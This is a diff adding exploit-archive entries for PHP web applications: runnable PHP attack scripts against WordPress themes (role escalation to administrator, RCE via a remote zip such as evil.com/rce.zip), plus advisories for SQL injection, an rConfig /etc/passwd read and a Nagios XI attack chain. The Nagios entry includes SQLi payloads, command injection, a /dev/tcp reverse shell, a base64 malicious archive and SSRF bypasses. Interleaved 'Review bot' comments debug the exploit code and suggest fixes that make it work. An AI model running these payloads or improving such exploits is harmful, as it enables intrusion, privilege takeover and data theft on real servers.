($options['m'] == 'd'){ + echo "Delete mode\n"; + $pay_load_obj = new CPDF_Adapter(); + $pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' ); + $pay_load = base64_encode(serialize(array($pay_load_obj))); + $data = array('stats_pdf'=>'1', 'data'=>$pay_load); + $curl->post($options['t'].'?'.http_build_query($data)); + $resp = $curl->getResponse(); + echo $resp; + } else { + echo "SQLi mode \n"; + echo "Trying a longin...\n"; + logIn(); + echo "Running SQL in Inject mode: ".$options['s']."\n"; + $pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load); + $resp = $curl->getResponse(); + //Grab the output + if (preg_match('~
(.*?)(?: + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} + + diff --git a/platforms/php/webapps/39894.php b/platforms/php/webapps/39894.php new file mode 100755 index 000000000..78b933a4b --- /dev/null +++ b/platforms/php/webapps/39894.php 
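Review bot: `CPDF_Adapter::set_file($file)` declares one parameter, but `exploit()` calls `$pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php')` with two; PHP silently discards the extra argument, so the second one is dead and should be removed. The header's `Vendor fixed: [???]` leaves the fix status unknown at publication, and the `Type: SQLi, Unserialize, File Delete.` line lists three issue classes without a per-issue description or affected version range, so the advisory half of the file is thinner than the code half; a short description of each issue and the fix status would help defenders. The regular expression on the last visible line is cut off in this view, so the output-parsing branch could not be checked.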
@@ -0,0 +1,125 @@ + + * Vendor Homepage: http://tagdiv.com/newspaper/ + * Software Link: http://themeforest.net/item/newspaper/5489609 + * Version: 6.7.1 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: WP Options Overwrite, Possible more + * Time line: Found [23-APR-2016], Vendor notified [23-APR-2016], Vendor fixed: [27-APR-2016], [RD:1] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:u:p:f:c:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + +function exploit(){ + global $curl, $options; + switch ($options['m']){ + case "admin_on": + echo "Setting default role to Administrator \n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'administrator'); + break; + case "admin_off": + echo "Setting default role to Subscriber \n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'subscriber'); + break; + case "reg_on": + echo "Enabling registrations\n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'1'); + break; + case "reg_on": + echo "Disabling registrations\n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'0'); + break; + + } + + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = 
$curl->getResponse(); + echo "Response: ". $resp."\n"; +} + + +exploit(); + + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + if (!isset($options['m']) || !in_array($options['m'], array('admin_on','reg_on','admin_off','reg_off') ) ){ + return false; + } + + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} diff --git a/platforms/php/webapps/39895.php b/platforms/php/webapps/39895.php new file mode 100755 index 000000000..16ffc6b3f --- /dev/null +++ b/platforms/php/webapps/39895.php 
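Review bot: `exploit()` contains two `case "reg_on":` labels; `validateInput()` accepts `reg_off`, but no case handles it, so in that mode `$data` is never assigned and the `post()` call after the switch runs with an undefined variable. The second label should read `case "reg_off":`, which matches its `Disabling registrations` message and `'wp_option[users_can_register]'=>'0'` payload. Separately, the header gives `Vendor fixed: [27-APR-2016]` as a date only; naming the fixed theme release would let readers check whether they are on a safe version.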
@@ -0,0 +1,152 @@
+
+ * Vendor Homepage:
+ * Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220
+ * Version: 1.3.0 possible 1.3.1
+ * Tested on: Debian 8, PHP 5.6.17-3
+ * Type: RCE, Arbirary file UPLOAD, (Low Authenticated )
+ * Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400]
+ */
+
+
+require_once('curl.php');
+//OR
+//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
+$curl = new CurlWrapper();
+
+
+$options = getopt("t:u:p:f:",array('tor:'));
+print_r($options);
+$options = validateInput($options);
+
+if (!$options){
+ showHelp();
+}
+
+if ($options['tor'] === true)
+{
+ echo " ### USING TOR ###\n";
+ echo "Setting TOR Proxy...\n";
+ $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
+ $curl->addOption(CURLOPT_PROXYTYPE,7);
+ echo "Checking IPv4 Address\n";
+ $curl->get('https://dynamicdns.park-your-domain.com/getip');
+ echo "Got IP : ".$curl->getResponse()."\n";
+ echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
+ $answer = fgets(fopen ("php://stdin","r"));
+ if(trim($answer) != 'wololo'){
+ die("Aborting!\n");
+ }
+ echo "OK...\n";
+}
+
+
+function logIn(){
+ global $curl, $options;
+ file_put_contents('cookies.txt',"\n");
+ $curl->setCookieFile('cookies.txt');
+ $curl->get($options['t']);
+ $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
+ $curl->post($options['t'].'/wp-login.php', $data);
+ $status = $curl->getTransferInfo('http_code');
+ if ($status !== 302){
+ echo "Login probably failed, aborting...\n";
+ echo "Login response saved to login.html.\n";
+ die();
+ }
+ file_put_contents('login.html',$curl->getResponse());
+
+
+}
+
+function exploit(){
+ global $curl, $options;
+ echo "Generateing payload.\n";
+ $data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']);
+ echo "Sending payload\n";
+ $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
+ $resp = $curl->getResponse();
+ echo "Eco response: ".$resp."\n";
+ $resp = json_decode($resp,true);
+ if ($resp['success'] === 'Font downloaded and extracted successfully.'){
+ echo "Response ok, calling RCE\n";
+ $file_path = parse_url($options['f']);
+ $remote_file_info = pathinfo($file_path['path']);
+ $zip_file_name = $remote_file_info['basename'];
+ $zip_file_name_php = str_replace('.zip', '.php', $zip_file_name);
+ $url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php;
+ echo 'Url: '. $url."\n";
+ //POC Test mode
+ if ($file_path['host'] == 'wp0day.com'){
+ echo "Exploit test mode on\n";
+ $rnd = rand();
+ echo "Rand $rnd, MD5: ".md5($rnd)."\n";
+ $url = $url . '?poc='.$rnd;
+ }
+ $curl->get($url);
+ echo "RCE Response:";
+ echo $curl->getResponse()."\n\n";
+ }
+}
+
+
+logIn();
+exploit();
+
+
+
+function validateInput($options){
+
+ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
+ return false;
+ }
+ if ( !isset($options['u']) ){
+ return false;
+ }
+ if ( !isset($options['p']) ){
+ return false;
+ }
+ if ( !isset($options['f']) ){
+ return false;
+ }
+ if (!preg_match('~/$~',$options['t'])){
+ $options['t'] = $options['t'].'/';
+ }
+
+ $options['tor'] = isset($options['tor']);
+
+ return $options;
+}
+
+
+function showHelp(){
+ global $argv;
+ $help = << zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php
+
+
+
+Examples:
+ php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip
+
+ Misc:
+ CURL Wrapper by Leonid Svyatov
+ @link http://github.com/svyatov/CurlWrapper
+ @license http://www.opensource.org/licenses/mit-license.html MIT License
+
+EOD;
+ echo $help."\n\n";
+ die();
+}
diff --git a/platforms/php/webapps/39896.txt b/platforms/php/webapps/39896.txt
new file mode 100755
index 000000000..f7a0c07d8
--- /dev/null
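Review bot: In logIn() the failure branch prints `Login response saved to login.html.` and then calls die(), but the `file_put_contents('login.html', ...)` that writes the response sits after the `if` block, so on a failed login nothing is saved and the message is untrue. Moving `file_put_contents('login.html',$curl->getResponse());` ahead of `if ($status !== 302){` makes the message accurate. Separately, the `print_r($options)` near the top of the file echoes every parsed option, including the `-p` password, to stdout, where it lands in terminal scrollback and any captured output; masking that entry before printing would be prudent. The `cookies.txt` and `login.html` files are also written to the current working directory with no cleanup, leaving session material on disk after the run.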
+++ b/platforms/php/webapps/39896.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection
+# Date: 06-06-2016
+# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+
+1. Description
+
+`$_POST['id']` is not escaped.
+
+`populate_download_edit_form()` is accessible for every registered user.
+
+http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html
+
+
+2. Proof of Concept
+
+Login as regular user.
+
+ + +
+
+3. Solution:
+
+Update to version 2.1.0
\ No newline at end of file
diff --git a/platforms/php/webapps/39898.txt b/platforms/php/webapps/39898.txt
new file mode 100755
index 000000000..873b1d092
--- /dev/null
+++ b/platforms/php/webapps/39898.txt
@@ -0,0 +1,39 @@
+Title
+===================
+rConfig, the open source network device configuration management tool, Vulnerable to Local File Inclusion
+
+Summary
+===================
+rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server.
+
+Affected Products
+===================
+rConfig 3.1.1 and earlier
+
+CVE
+===================
+N/A
+
+Details
+===================
+rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. This is because downloadFile.php does not check the download_file parameter before it uses it. It merely opens and sends the file in the parameter to the user. As long as the account running the web server has access to it, rConfig will open it and send it.
+
+Verification of Vulnerability
+===================
+The following steps can be carried out in duplicating this vulnerability.
+
+Step 1:
+Enter the following into your browser address bar:
+
+ http:///lib/crud/downloadFile.php?download_file=/etc/passwd
+
+Step 2:
+Confirm that the passwd file is valid
+
+Impact
+===================
+Information Disclosure. User privileges and unauthorized access to the system.
+
+Credits
+===================
+Gregory Pickett (@shogun7273), Hellfire Security
\ No newline at end of file
diff --git a/platforms/php/webapps/39899.txt b/platforms/php/webapps/39899.txt
new file mode 100755
index 000000000..2dad76819
--- /dev/null
+++ b/platforms/php/webapps/39899.txt
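Review bot: The title and summary of the rConfig advisory classify the issue as local file inclusion, but the behaviour the Details section describes, downloadFile.php opening the file named in `download_file` and sending it back to the user, is an arbitrary file read (path traversal), not inclusion, since nothing in the write-up shows the file being executed. The distinction matters for triage: a file read discloses configuration and credentials, whereas inclusion would imply code execution. The Impact line `User privileges and unauthorized access to the system` is likewise a consequence the advisory does not demonstrate; `Information Disclosure` alone is what the text supports.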
@@ -0,0 +1,268 @@
+( , ) (,
+ . '.' ) ('. ',
+ ). , ('. ( ) (
+ (_,) .'), ) _ _,
+ / _____/ / _ \ ____ ____ _____
+ \____ \==/ /_\ \ _/ ___\/ _ \ / \
+ / \/ | \\ \__( <_> ) Y Y \
+/______ /\___|__ / \___ >____/|__|_| /
+ \/ \/.-. \/ \/:wq
+ (x.0)
+ '=.|w|.='
+ _=''"''=.
+
+ presents..
+
+Nagios XI Multiple Vulnerabilities
+Affected versions: Nagios XI <= 5.2.7
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
+
++-----------+
+|Description|
++-----------+
+The Nagios XI application is affected by multiple security
+vulnerabilities, including unauthenticated SQL injection and
+authentication bypass, arbitrary code execution via command injection,
+privilege escalation, server-side request forgery and account hijacking.
+
+These vulnerabilities can be chained together to obtain unauthenticated
+remote code execution as the root user.
+
++------------+
+|Exploitation|
++------------+
+==SQL Injection==
+The ‘host’ and ‘service’ GET parameters in the ‘nagiosim.php’ page are
+vulnerable to SQL injection via error-based payloads. An attacker can
+exploit this vulnerability to retrieve sensitive information from the
+application’s MySQL database such as the administrative users’ password
+hash (unsalted MD5) or the token used to authenticate to the Nagios XI
+REST API. This security issue is aggravated by the fact that an attacker
+can directly browse to the vulnerable page and exploit the vulnerability
+without providing a valid session cookie.
+
+[POC - DUMP ADMIN API TOKEN]
+GET
+/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+AND+
+(SELECT+1+FROM(SELECT+COUNT(*),CONCAT('|APIKEY|',(SELECT+MID((IFNULL(CAST(backend_ticket+AS
++CHAR),0x20)),1,54)+FROM+xi_users+WHERE+user_id%3d1+LIMIT+0,1),'|APIKEY|',FLOOR(RAND(0)*2))
+x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' HTTP/1.1
+
+The API token can be reused to bypass authentication either by creating
+a user via the REST API or through the Rapid Response functionality as
+shown below.
+
+[POC- BYPASS AUTHENTICATION THROUGH RAPID RESPONSE FUNCTIONALITY]
+// uid == --, object id value
+doesn't matter
+GET /nagiosxi/rr.php?uid=1-b- HTTP/1.1
+
+==Command Injection==
+Multiple command injection vulnerabilities exist in the Nagios XI web
+interface due to unescaped user input being passed to shell functions as
+an argument. This issues can be exploited to inject arbitrary shell
+commands and obtain remote code execution in the context of the 'apache'
+user.
+
+URL => GET
+/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id=&title=&status=
+PARAMETER => title
+POC PAYLOAD => title'; touch /tmp/FILE; echo '
+
+URL => GET
+/nagiosxi/includes/components/perfdata/graphApi.php?host=&start=&end=
+PARAMETERS => start, end
+POC PAYLOAD => 1; touch /tmp/FILE;
+
+==Privilege Escalation==
+The Nagios XI default sudoers configuration can be abused to elevate
+privileges to root due to an insecure implementation of the
+application’s component upload functionality. The ‘apache’ user can run
+the getprofile.sh script with root privileges without being prompted for
+a password. The getprofile.sh script is part of the Profile component
+along with the following files:
+
+- profile.php, the PHP script that outputs the system information.
+- profile.inc.php, a PHP include file with required functionality for
+profile.php.
+ +An attacker can backdoor the profile.php file with a function to execute +arbitrary shell commands (e.g. ), replace +the getprofile.sh file with a malicious payload (e.g. “#!/bin/bash bash +–i >& /dev/tcp// 0>&1”) and finally create a ‘profile.zip’ +archive containing the malicious component files. Once uploaded, the +application will unzip the component archive and overwrite the existing +profile directory and its files, including getprofile.sh. + +[POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE] +UEsDBBQDAAAAAD0KrEgAAAAAAAAAAAAAAAAIAAAAcHJvZmlsZS9QSwMEFAMAAAAAZQqsSAAAAAAA +AAAAAAAAABAAAABwcm9maWxlL3Byb2ZpbGUvUEsDBBQDAAAIACQKrEhqbbyRlwAAANQAAAAbAAAA +cHJvZmlsZS9wcm9maWxlL0NIQU5HRVMudHh0bc6xCsIwFIXhPU9xXiDSxKWOTiIUHQrqGkxiAyE3 +9N5S9OltHcTBMx9+vsZqs9O2MVuYjVX6Z0pj733wOIUZcSp3SVRcTvKEEDzNJZPz6M4HxJQDwxWP +7CSwgIurPJAwUoHDK1VEGsFTrTTKBhp99+1XhnYhrlUZAjI9kBMLPielmlbbdiXahWjUH+DtiEsY +eeFB91f1BlBLAwQUAwAACAAkCqxI51eWwTkAAAA7AAAAHQAAAHByb2ZpbGUvcHJvZmlsZS9nZXRw +cm9maWxlLnNoU1bUT8rM009KLM7g4gKRCrqZCnZqCvopqWX6JckF+oaWRnqGZhZ6hhZA2sRM38LA +wkDBwE7NkAsAUEsDBBQDAAAIACQKrEjwiJFluAQAAFcLAAAfAAAAcHJvZmlsZS9wcm9maWxlL3By +b2ZpbGUuaW5jLnBocLVWUY/SQBB+pr9ibEwoEctxicaoaBBRGznOHJwaX5qlHdrNtbt1u70Tjf/d +2d0ChyfxRQkP7e7M930zO/vB85dVXoE3GMDZeLGA8eT9/PzTbPr67RQm52cfzufT+ZJ2TcBEVhvF +s1xDkPTg9GR4AnOWcVnDVGhUleI11n2YzSYhwLgowAbXoLBGdY1paEAs1f0ofQqVkmteYMhFEhoN +w+EjC/rw5MnD4WMYPn46fPT09PEXKLNG54oj3PcomcKLJkXQOUKORYUKDIyn8GvDFcZSJBikXAlW +YhDHb6LZNI57YXcQhoNElpUUKLRL3FJ3e88MshFaYaIttEn37rca411ibNZHfrvut3mNsDlccM1Z +wb8zzaWAdSMS8+DdRTGRgWX9Rx8C2p8XRPNoCW8u55NldD5f/DsSb1sSHCvph9fJCrliBRzp3TOv +43UGg5WUBTIBWkKSY3IFa6mgYBprDdeoatO2zv32SV6N7oLZtDYg6LWwu21IsU4Ur7QDMm+jDLXG +bzrwlzmvYR+aKDTEwKDe1BrLbXFQomiAu7MdpyU9VUxgAV7nJudJDgkVsEJoakytfq1ksyqwzqXU +XGRQNaqSNdah7/TxdXBvX1PP67TC/OerF364kzdVSqqn8JvKdr7r7Z37HNFtORkOL4bhENrmKWIK +/ecDgmsbwopij1FvQYDBGm+Aqawp7bqWsLo1v5hSklKY6GITAlADKbQeMaXYJvBIN02bQIpi9p7Q +wm724vn4bAqjF8fOv38Q/HF6saARNfFdqqPbh4Pt1+Pl1O49GZzS92R42u239FxQx0um+TXun6U4 
+SB9fLt+dXxgA/4hR+f1DvulichF9WLaS7OkcRiyj5WxqERduVj60TmB1bcdQYcZpV4E+PMMbrnM6 +OCpyG7HvTnCsYbb3W2S4BY3A0tTM6M5p7IgdTtieiEZhxZKrYDKezV6Rz8dn0/nlIjZeEY1n0Zfp +6373roSWomsE/CQN3r/zrCM2dhYtJv/BvP7uZ8f9xfiau77bhBi/UVvroJuhjik5bRIdKyyQ1djt +ucbrRglYs6LGZ24o2gucKWTuBJmAU3uFLfgfoILecwq4C+dt37Vq0J3MvpajhxiYURqJpij+7tOt +ZK04Xrsf28uLmXW5w5kmb2hUsSKtxl9vgdBqbJaPzXXPMqx51igE2dDlyJGeom4JmTTuKZ3xGuEd +Yin5aM1FGpv3mGssAzO/8fj1WTTv+2b1ITMe/bBkgmXorDyRghj8vs9T8mDbZQPkegD0M8R4AXwN +EaQ8FV0NhsJdrZW8duRgyGB3BIRi5EiVohpliq1ia4vxNVMGu+/bHaIkQiAKsnTFEu3aRkGcrQqE +tZKl5aEUsADg1DncEWX/zijwxm26mAcn4fAZ4aeoUVHdJHbj9Npt8Kz9p6kj1tI1k3EBuSxdZUTJ +0iMddV5PzL7eVOhbyyu4uPL7do1r8rw/+yBt89Tu3T6V6va+VWhDdlW59UrXdnnHTjVY/by2+iuW +4W4qyE6LAqi3DVnbBirJhaZCQ5dGayDX1JQ24rYNS3VFE1Y7gJxVFQo3bkTj/jYYDD9XuHYq2xEP +/UFbh/nb6PfBfkxsz7g/TZi5ip738sUvUEsDBBQDAAAIACQKrEiYmhdm9woAAFwcAAAbAAAAcHJv +ZmlsZS9wcm9maWxlL3Byb2ZpbGUucGhwtVl5U+M2FP87/hSvbqZ2OiGBXtMNhJYu0DJDgYHQa7vj +cWwl9qxju7LMsTt89/6eJCchCZRezG5iS7936F16Uva+KZPS6ffxj14X5b1Mp4kiP+rQZ9vbX2/h +4xWdhdO0qOgoV0KWMq1E1aXT09c9ooMsI01RkRSVkDci7llm7ZN4QNOsGIdZVOSTdNqDIPp85xUY +72xvbb/a+uwL2nk12Pl68NmXv5GYhlmlwpjaIC7GAZ6l8ju75EjxR51KERR5JPw4lXk4E34QHJ+c +HgVBp+f1e71+VMzKIhe5SkRWCtlL84jFeZ1dx6nuKyVmfjv4/mj0xo1msfsWw6ximqcqDbP0fajS +IqdK1ZOJU0IUT/gWpBUhrLkCxuGZwL40iKkMxwTmVEi6OL8a0U0o03CciYocngt4BaJSAcarhihK +RPSOIAyTlaPfAvO2AglrlWBhaaSVtMjHg/4EthOWqsizewrjWZpXFIU5hVEEdUklaUVlOBVOOvHT +KmAEVjAcGtoPTqsNNykwpd6QqA1nyDfeWaEOIKqQ6XsRH0lZyJG4U97bXacl7oyNWg8sNk6rMgvv +yRgb6yomaSYcp62ApyGt2sH3qvBGKGbWtdoTXJUUt4Gl9TWpHraaMR/P4wFnUueR9tk6BUCGIX1w +nJYJQGo47GIonVjWhEU7rVZ/w9+VWcZpMa2oT1d5WEKQosN6Vi7DQD0VKsgAC8I8DioDNHHb6n+K ++USEsZC++9oosHUIQxVVysoPKFQqjJIZK0a8Ag7toV1NT90pF/ZdZzG6L8WAeAl92DzNgTLrqIQi +AyYFDIUVhRpHcXGbZ0UYQ6vHfnaHw6FN719O6CRHtGeZSYcLowcAv+e/5y40+bQPOQ/4L2BfYvO1 +4iLgoLLpmtdZ1lWy1t7E7LhOs7hxT1DUqqyVNT7YGaWjrAAzZgLl2DkfNd7h95aIkoLy7LOx9BvF +wbyFP6ZfKCDy2G8ktxCTLaMkdNSWURLRB2tFgvaSu31SITx7m6qEcnGbpbmotLS2Hh9SKGV473t7 
+yRf7Xtfb69vv5Evzar+Rr+ZdP0CyZpFnCw7u7/kQf27XHTZ27GJsfWjxpX2+8NKQlnT3tX5dFtFd +WMMsUQpVy5yaYWMGzBiPOQ9LSfOMW+jDhpxpPS4O7l7y+f7zQbPXB8RlykcefRx9bmsvTm+wvntE +mXebxioZ7Hy5Xd7tIop5UxnsvOKXCSJXDSSP7HoUZWFVDb1xVotxrVSRexC0xjikRIrJ0PvQDq6O +Ln86unzjXfxwgefTY+/twzdN8RlyyHj7hzY9FuqHm5j2oa4ef+CFoUr8ejU6+hGG1lXIlL4ASajS +fFrp2shJoKFGCTo5Oz5v8GGJ3BcreEBHJz8e0dXo+vjYAlU6ewQjg4Ppr0oRpZM0osNQhRZ9l2L7 +mhTAQbIGVvXYluUIfqqclqzzYD4YKJRkKx1Rslpc15fFbnwiSGxIIfyx+Qa13qm9nDNjMckR5JHX +W0JIIJ4FzAwLcSci37tN0iihaV7MxJbdib1u20Rxt63HNZrWwhZpawr7gFOYPUn4e4RZhPVPQjJr +GpDb4yIP7eI6wuZlxv1Oz+WquCKjWQRPERs/RpxFiuIUaVwQNgmyDNgk1ljf6jxkIZZV5Xt9oSLk +dJyEakuKTISVgBFsOjG+AwZ/zWEi4kKGT3B4CYOsGj+iXjGqpl8xgm+cQPu03aFvyP1ev6UV5YWi +1FQLEcNCbFsysyeL4XnZMK3OpJBs+7t7v9OZ+4pNfcGDFJalQFtFqqCxAHeqK2t852E1ltdTznlB +uTOBc8CkrCf0melaZ2OIVtGoM03wcOxw2UHqX52cn3HEbCA4mOKRoYta9cNodBFc4y04+P7obOS9 +NaSrlFfccUs6Q5I8pjffwdnBj0d/QXsQxxJJtJH84PDw8i/ILwqpNtJenF/O1abWqi/WqxqqyhOu +4Dqg3hPiCs03h6jvxaESPWbwvsgRljTkxpBjjRtWAlMPofUUepc2OvgQqP4IqOf8OrJcBtSohfU9 +DWXLQLopcU9431SkOdzUuP44zftMSVuXC8p1My7K/cadGyRmB4CMUFUs+26WwZSc6Hji4s4zAUSF +vinT/M6vttkGORQRsyLHxoHYF0gDn7ls7dvh5oHbzXas9Vjiwpn6oR1v7ZsC/WBX8sB8k6JSUVHn +CmIRhHWm2MtsgaD6IwtwWJD3/uF3wdnh+fXo5PSq62L/Pno9otfn12cj/9MOHV+e/0i5rtkBc6vc +Tmd3oaflqjWTqB6NQMjBwJttnGPYOgjlNBJ6otVa1uWfqmI5Vu5zyljQuj5hHHM5a0yIB4kcIWfF +qq8vrumUm5adLwf0wbgkw7v53PnyQcfmKtWoUIiQH9hWgyWDPIO9sosZrKhsPckaNwFtfEyb0mux +sXKvYnNsJRHn0rUZapkRejghBQ7+pnVZ43zc5ILHET3GJhXUMvXINMO6qi1PNJv2y/hkT/HJXswn +eodziaZIgZJ5mAW8EHvoXuO/TKAh/1aOkvVfiAFiLmWl/VvZf22NbuuX5pRtSvREdxBFKXLbNdxC +jIxwNpJNy9GemMpwm/BJ/aOJKPSYGWy1+QjGPEFXYdwcakCmJ5AYw6H3MSo8GyHNa9FMIzVwmjao +rlfDO412BdrOj4bD44PTqyMrZKG6kpZFa4zcfMePfErCh+ntLRKHyhugl0qyPo22E6VKI4hXZ/XI +sPgFmW5+OrQq0TjCDuN9xeLrjfnazjiZ7tJ6obd1Pivgdc5pKrlioOAU2Y3YlI4XPD8SQM5pbE4C +rYmHZJasX7Yi+nyBpM/2P9nx1qPyss5zoAekT8aGjTkcmxBO0P6a04EOFQ0wIUKODQy/Pa4n80Cw +FF36YvvVVzDnRzZxsNzHopmK73ZKfZvQ0IGvLVDg1lxN8W6JUe3EaqjvpfRZXd9KsX27LseRnnab 
+uyngkSxD31KZvPrGNaCB/oblWJLZAf7IGuNvLIba8JwjNCq0WZfsT0YWDpyDJYe6PVbtjTe/6NS7 +vvf2jdcI5Oc4lSJSnNfcevXTPBZ3fI5ab99+5vvKY1nM6PrydEAsURf0513aryupg4J1N0SNf9fd +6z5Guz29LI+2zqmvZuXcUoFRE0MmrrqkQ+J/igjn0U3I5tu7zb0Ue/d9WhLju5SFip3Y0HQpntBW +0tUnPFWUTmupaszewTG0VRJbxPjUrv4u7SPsFtfXVd+eHxcnWigQ21st3YvVsBPuXivF2WXRhKpf +ED8tH8I33vPYSzLnpZdi//5K7D+4EGs5f+8+TK+3rJcPsy83fX/pAhZusG9gawuJDgDtZ/O7xjwG +Wo3TewxruFTJmi+dpsurwjxV92ajhTvNRgmMPjsTh6G9AHUvLs/5Bw/67vrk9JCOD/B8uDeW1N83 +O7fFmUrGMeJbmXCBDRrzTreJkGLh4BAvicKhQO+E1Vzg6/PDowFpZYwcI8Xe+tP8Dow4JW7Diko0 +FbiIjbtUCdgmVUgDPoxL+A6YoftyD/SAd+1t2KyQwtrJXF1o3+oEqHxm3Fk203GIWU5AbnlkKm6E +1o9pPoKhNi8hSuIUpR8fHdPOzPhoyjfoQxfXC5n9laVvtbLX8V5zHc/AAXm9BRnYrF3aoz2YqoQv +PHpanSp9L6z+u7Rg+vKfCVyvh3aUny2fnuci4Ww3tn6dwxhstmON6cPUqBmE6hTKexsa+g5FFrfa +Z6bTmTQdvsQJzxjTadU5QuedEWpOpeYnO24pJ1ldJdq63+w7fwJQSwECPwMUAwAAAAA9CqxIAAAA +AAAAAAAAAAAACAAkAAAAAAAAABCA7UEAAAAAcHJvZmlsZS8KACAAAAAAAAEAGAAAB2elDazRAQAx +3LoNrNEBAASruQ2s0QFQSwECPwMUAwAAAABlCqxIAAAAAAAAAAAAAAAAEAAkAAAAAAAAABCA7UEm +AAAAcHJvZmlsZS9wcm9maWxlLwoAIAAAAAAAAQAYAABbUdANrNEBAPAL2w2s0QEAW1HQDazRAVBL +AQI/AxQDAAAIACQKrEhqbbyRlwAAANQAAAAbACQAAAAAAAAAIICkgVQAAABwcm9maWxlL3Byb2Zp +bGUvQ0hBTkdFUy50eHQKACAAAAAAAAEAGACACwGHDazRAYALAYcNrNEBAASruQ2s0QFQSwECPwMU +AwAACAAkCqxI51eWwTkAAAA7AAAAHQAkAAAAAAAAACCA7YEkAQAAcHJvZmlsZS9wcm9maWxlL2dl +dHByb2ZpbGUuc2gKACAAAAAAAAEAGACACwGHDazRAYALAYcNrNEBAASruQ2s0QFQSwECPwMUAwAA +CAAkCqxI8IiRZbgEAABXCwAAHwAkAAAAAAAAACCApIGYAQAAcHJvZmlsZS9wcm9maWxlL3Byb2Zp +bGUuaW5jLnBocAoAIAAAAAAAAQAYAIALAYcNrNEBgAsBhw2s0QEABKu5DazRAVBLAQI/AxQDAAAI +ACQKrEiYmhdm9woAAFwcAAAbACQAAAAAAAAAIICkgY0GAABwcm9maWxlL3Byb2ZpbGUvcHJvZmls +ZS5waHAKACAAAAAAAAEAGACACwGHDazRAYALAYcNrNEBAASruQ2s0QFQSwUGAAAAAAYABgB2AgAA +vREAAAAA + +[POC - PRIVILEGE ESCALATION EXPLOITATION] +GET /nagiosxi/includes/components/profile/profile.php?cmd=sudo +./getprofile.sh + +The default Profile component archive can be downloaded at the following +link: 
+https://assets.nagios.com/downloads/nagiosxi/components/profile.zip
+
+==Server-Side Request Forgery==
+Multiple server-side request forgery vulnerabilities exist in the Nagios
+XI application. An attacker can provide arbitrary data to curl_exec
+calls to port scan internal services listening on localhost, read files
+on the Nagios XI server file system or send data to other hosts in the
+same internal network where the Nagios XI server is deployed.
+
+// the application filter the string 'file://' can be bypassed by
+converting the handler to uppercase
+URL => GET /nagiosxi/ajaxproxy.php?proxyurl=
+PARAMETER => proxyurl
+POC PAYLOAD => FILE:////
+
+URL => GET /nagiosxi/backend/?cmd=geturlhtml&url=
+PARAMETER => url
+POC PAYLOAD => file:////
+
+==Account Hijacking==
+The Nagios XI application is vulnerable to an arbitrary account
+hijacking vulnerability due to an insecure implementation of the
+password reset functionality. The application does not enforce any
+verification to confirm the provided reset token can only be used to
